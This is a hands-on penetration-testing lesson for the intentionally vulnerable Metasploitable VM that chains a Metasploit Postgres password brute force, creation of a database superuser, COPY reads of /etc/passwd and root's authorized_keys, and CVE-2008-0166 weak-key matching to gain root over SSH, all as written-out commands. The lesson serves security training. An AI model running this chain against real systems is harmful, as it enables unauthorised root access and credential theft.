(Metasploitable Project: Lesson 12)

{ Postgres SQL Bruteforce, Obtain and Crack root SSH Key }

1. What is the scenario?
   • Have you ever heard stories of how hackers were able to use a database to ultimately obtain root access to the server? Well this lesson illustrates why weak passwords and file permission are an absolute necessity in today's digital age.
   
   
2. What is Metasploitable 
   • Metasploitable is an intentionally vulnerable Linux virtual machine.
   • This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
   • http://www.offensive-security.com/metasploit-unleashed/Metasploitable
   
   
3. Pre-Requisite Lab
   • Metasploitable Project: Lesson 1: Downloading and Configuring
   
   
4. What is auxiliary/scanner/postgres/postgres_login?
   • This Metasploit module simply queries the Postgres SQL Database for a specific user/pass (the default is user is postgres).
   
   
5. What is exploit CVE-2008-0166?
   • OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
     • We will use this exploit to download 32768 potential ssh private/public key pairs for a future brute force attack.
   • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166
   
   
6. Reference
   • Special Thanks goes to @Japtron for providing the blueprint for this complicated attack vector.
   
   
7. Lab Notes
   • In this lab we will do the following:
     1. Run a basic and NMAP Scan.
     2. Run an NMAP Scan using service version detection.
     3. Search for the ssh and postgres daemon using NMAP version scan.
     4. Download SSH RSA 2048 public/private key repository for Bruteforce key matching.
     5. Use Metasploit to correctly guess the Postgres SQL postgres password.
     6. Copy the contents of /root/.ssh/authorized_keys into a table.
     7. Used the public authorized_key and search the RSA repository for a matching private key.
     8. Use found private ssh key to login to Metasploitable as root.
   
   
8. Legal Disclaimer
   • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
   • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
   • In addition, this is a teaching website that does not condone malicious behavior of any kind.
   • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
   • © 2015 No content replication of any kind is allowed without express written permission.

1. Start Up VMWare Player
   • Instructions:
     1. Click the Start Button
     2. Type Vmplayer in the search box
     3. Click on Vmplayer
   • 

    

2. Open a Virtual Machine
   • Instructions:
     1. Click on Open a Virtual Machine
   • 

    

3. Open the Metasploitable VM
   • Instructions:
     1. Navigate to where the Metasploitable VM is located
     2. Click on on the Metasploitable VM
     3. Click on the Open Button
   • 

    

4. Edit the Metasploitable VM
   • Instructions:
     1. Select Metasploitable2-Linux VM
     2. Click Edit virtual machine settings
   • 

    

5. Edit the Metasploitable VM
   • Instructions:
     1. Click on "Network Adapter NAT"
     2. Select the radio button "Bridged: Connected directly to the physical network"
     3. Click on the OK button
   • Warning:
     • By changing from NAT to Bridged opens the VM and network up to potential attacks.
     • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, or (3) use an ACL to not allow traffic into your network, etc.
   • 

    

6. Play the Metasploitable VM
   • Instructions:
     1. Click on the Metasploitable VM
     2. Click on Play virtual machine
   • 

1. Logging into Metasploitable
   • Instructions
     1. Username: msfadmin
     2. Password: msfadmin or whatever you changed it to in lesson 1.
   • 

    

2. Retrieve IP Address
   • Instructions:
     1. ifconfig
     2. Record Your Metasploitable IP Address.
   • Note(FYI):
     • This is the IP Address of the Victim Machine.
     • My IP Address is 192.168.1.116.
     • Record your IP Address.
   • 

    

1. Start Up VMWare Player
   • Instructions:
     1. Click the Start Button
     2. Type Vmplayer in the search box
     3. Click on Vmplayer
   • 

    

2. Open a Virtual Machine
   • Instructions:
     1. Click on Open a Virtual Machine
   • 

    

3. Open the BackTrack5R1 VM
   • Instructions:
     1. Navigate to where the BackTrack5R1 VM is located
     2. Click on on the BackTrack5R1 VM
     3. Click on the Open Button
   • 

    

4. Edit the BackTrack5R1 VM
   • Instructions:
     1. Select BackTrack5R1 VM
     2. Click Edit virtual machine settings
   • 

    

5. Edit Virtual Machine Settings
   • Instructions:
     1. Click on Network Adapter
     2. Click on the Bridged Radio button
     3. Click on the OK Button
   • 

    

6. Play the BackTrack5R1 VM
   • Instructions:
     1. Click on the BackTrack5R1 VM
     2. Click on Play virtual machine
   • 

    

7. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 

    

8. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 

    

9. Start up a terminal window
   • Instructions:
     1. Click on the Terminal Window
   • 

    

10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
      2. Record your IP Address (See Picture)
    • Note(FYI):
      • My IP address 192.168.1.139.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).
    • 

     

1. Run Basic NMAP Scan against the Metasploitable VM  (On BackTrack)
   • Note(FYI):
     • Replace(192.168.1.116) with your Metasploitable VM obtained from [Section 2, Step 2].
   • Instructions:
     1. nmap 192.168.1.116
     2. Notice nmap displays many services including 5432/postgresql and 22/ssh.
   • Note(FYI):
     • nmap is being used to scan all the TCP ports for listening services.
     • This is pretty great, but it would be nice to know the version of each service.
   • 

    

2. NMAP Version Scan
   • Note(FYI):
     • Replace(192.168.1.116) with your Metasploitable VM obtained from (Section 2, Step 2).
   • Instructions:
     1. nmap -sV -p5432,22 192.168.1.116
     2. Notice nmap show the version of ssh (OpenSSH 4.7p1 Debian 8ubuntu1) and postgresql (PostgreSQL DB 8.3.0 - 8.3.7).
   • Note(FYI):
     • nmap -sV is used to detect the version of each service. 
     • You can use version information to search places like http:\\www.exploit-db.com -or- http://cve.mitre.org to find vulnerabilities.
     • In this case, we will be exploiting a vulnerability that exists in OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems that use a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
   • 

1. Create Password File (On BackTrack)
   • Instructions:
     1. cd /var/tmp
     2. wget --no-check-certificate http://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson12/5622.tar.bz2
        • Where " " is a space.
   • Note(FYI):
     1. Use (cd) to change directory to the /var/tmp directory.
     2. Use (wget) to download file (5622.tar.bz2) from github.com.  The flag (--no-check-certificate) is used not verify the SSL certificate.
   • 

    

2. Create Password File (On BackTrack)
   • Instructions:
     1. ls -l 5622*
     2. tar xvjf 5622.tar.bz2
   • Note(FYI):
     1. Use (ls -l) to display the details of the 5622.tar.bz2 tar file that contains approximately 32768 potential ssh keys for a future brute force attack.
     2. Use (tar) to unzip the tar file (5622.tar.bz2). FYI: x is to extract, v is verbose, j is to specific bzip files, and f specifies the file.
   • 

1. Start Up Metasploit msfconsole (On BackTrack)
   • Instructions:
     1. msfconsole
   • Note(FYI):
     • Metasploit takes about 5 to 20 seconds to start up.
   • 

    

2. msfconsole screen
   • Note(FYI):
     • This is the msfconsole
     • Your picture (Rabbit, Cow, Graffit, Cyber Missle, etc) will probably be different than mine.
   • 

    

3. Search for Metasploit Module
   • Instructions:
     1. search postgres
     2. Highlight and Right Click on auxiliary/scanner/postgres/postgres_login
     3. Select Copy
   • 

    

4. Set Metasploit Module
   • Instructions:
     1. use auxiliary/scanner/postgres/postgres_login
     2. show options
     3. In the follow steps we will set STOP_ON_SUCCESS and RHOSTS.
   • 

    

5. Set the PASS_FILE and RHOSTS
   • Note(FYI):
     • Replace(192.168.1.116) with your Metasploitable VM obtained from (Section 2, Step 2).
   • Instructions:
     1. set RHOSTS 192.168.1.116
     2. set STOP_ON_SUCCESS true
     3. show options
   • Note(FYI):
     1. RHOST is set to Metasploitable's IP Address.
     2. STOP_ON_SUCCESS is set to stop guessing passwords once the credentials works.
   • 

    

6. Brute Force Postgres Password
   • Instructions:
     1. exploit
     2. Notice the Postgres Database username (postgres) and password (postgres) was successfully guessed.
     3. exit
   • 

1. Install PostGreSQL (On BackTrack)
   • Instructions:
     1. apt-get install postgresql
     2. Do you want to continue [Y/n]? Y
   • Note(FYI):
     1. If postgresql is not found in the repository, then you must update the sources.list repository by following the directions in (Install BackTrack 5R1 Lesson 1, Section 7, Step 1).
   • 

    

2. Determine MySQL Version
   • Note(FYI):
     • Replace(192.168.1.116) with your Metasploitable VM obtained from (Section 2, Step 2).
   • Instructions:
     1. psql -h 192.168.1.116 -U postgres
     2. Password for user postgres: postgres
     3. select version();
   • Note(FYI):
     1. The first command allows you to log onto the Postgres SQL database that resides on the Metasploitable VM. The flag (-h) specifies a remote host and (-U) specifies the username that you wish to use.
     2. select version() displays the version of Postgres Database, the OS Kernel and the version of the C++ compiler.
   • 

    

3. Display and Create Users
   • Instructions:
     1. select * from pg_user;
     2. CREATE USER hacker WITH PASSWORD 'abc123';
     3. select * from pg_user;
     4. ALTER USER hacker WITH SUPERUSER;
     5. select * from pg_user;
   • Note(FYI):
     1. The query (select * from pg_user) displays all usernames of the database.
     2. The statement (CREATE USER hacker WITH PASSWORD 'abc123') allows you to create the username (hacker) with password (abc123).
     3. Notice when username hacker is first created the SUPERUSER role (usesuper) is set to false.
     4. The statement (ALTER USER hacker WITH SUPERUSER) allows you make the username (hacker) a superuser.
     5. Notice the username hacker's SUPERUSER role (usesuper) is now set to true.
   • 

    

4. Show Schemas and Databases
   • Instructions:
     1. \dn
     2. \l
   • Note(FYI):
     1. \dn, will display all schemas.
     2. \l, will display all databases.
   • 

    

5. Create Table Capture /etc/passwd
   • Instructions:
     1. CREATE TABLE accounts (linux_users TEXT);
     2. COPY accounts from '/etc/passwd';
     3. select * from accounts where linux_users like '%bash%';
   • Note(FYI):
     1. Create a table called accounts.
     2. Copy the /etc/passwd file into the accounts table.  This is very sneaky.  Because it shows you a technique to gather sensitive information without having shell access (ie., a terminal window) on the server.
     3. Display records from the accounts table that contains the %bash% string.  This is important, because users with a /bin/bash shell have the ability to remotely login to the server.
   • 

    

6. Retrieving root's authorized_keys file
   • Note(FYI):
     • Replace(192.168.1.116) with your Metasploitable VM obtained from (Section 2, Step 2).
   • Instructions:
     1. CREATE TABLE sshkeys (auth_key TEXT);
     2. select * from accounts where linux_users like '%bash%';
     3. COPY sshkeys from '/root/.ssh/authorized_keys';
     4. \q
     5. psql -h 192.168.1.116 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
     6. Password for user postgres: postgres
     7. Notice the ssh-rsa key that we retrieve from a poorly protected /root/.ssh/authorized_keys file.
   • Note(FYI):
     1. Create a table named sshkeys.
     2. Show only potential victim accounts with a /bin/bash shell.
     3. Copy root's authorized_keys file into the sshkeys table.  This is only possible because of improper permissions.
     4. \q, quit or exit the database.
     5. -c 'select * from sshkeys limit 1', the (-c) flag will allow you to execute a query remotely from command line without invoking the psql shell.  tee sshkeys.txt, display output results and write those results of a file (sshkeys.txt);
     6. Arrow #7 displays the public key that we will now have to find the corresponding private key.  
   • 

    

7. Search and Find SSH Private Key
   • Instructions:
     1. ls -l sshkeys.txt
     2. grep "ssh-rsa" sshkeys.txt | awk '{print $2}'
     3. grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
     4. fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*pub | tee keys.txt
   • Note(FYI):
     1. Use (ls -l) to display the file ownership, permissions, and byte size of the sshkeys.txt file.
     2. Use (grep) to search for "ssh-rsa" in the sshkeys.txt file.  Use (awk) to display the second column of the output separated by white space.
     3. Same as above, except we will use (sed) to remove "==" that is at the end ($) of the line.
     4. Use (fgrep) to search the previously downloaded ssh public keys, which is the output from command #3.  This will take between 5 to 10 minutes to run.
        • Eg., fgrep `command #3` public_keys
   • 

    

8. Use SSH Private Key to become root
   • Note(FYI):
     • Replace(192.168.1.116) with your Metasploitable VM obtained from (Section 2, Step 2).
   • Instructions:
     1. cat keys.txt
     2. cat keys.txt | awk -F: '{print $1}'
     3. cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
     4. ssh -i `cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.1.116
     5. yes
     6. id
     7. exit
   • Note(FYI):
     1. Use (cat) to display the keys.txt file.
     2. Use (awk) to display the first column of the keys.txt file that is delimited by a ":".
     3. Use (sed) to remove ".pub" from the output of command #2.
     4. Use (ssh) to establish a secure connection; use the (-i) flag to specify the sshkey; connect as username root to the metasploitable VM.  Below is the actual command.
        • ssh -i /var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.116
     5. Answer (yes), will will add Metasploitable RSA signature to BackTrack's known host file.
     6. Use (id) to show the real and effective username.  Notice you are root.
     7. Use (exit) to exit from the ssh connection into the metasploitable VM.
   • 

    

1. Proof of Lab (On BackTrack)
   • Instructions
     1. grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
     2. cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
     3. ssh -i /var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.116 "id;hostname"
        • Where " " is a space.
     4. date
     5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
   • Proof of Lab Instructions
     1. Press the <Ctrl> and <Alt> key at the same time.
     2. Press the <PrtScn> key.
     3. Paste into a word document
     4. Upload to Moodle
   •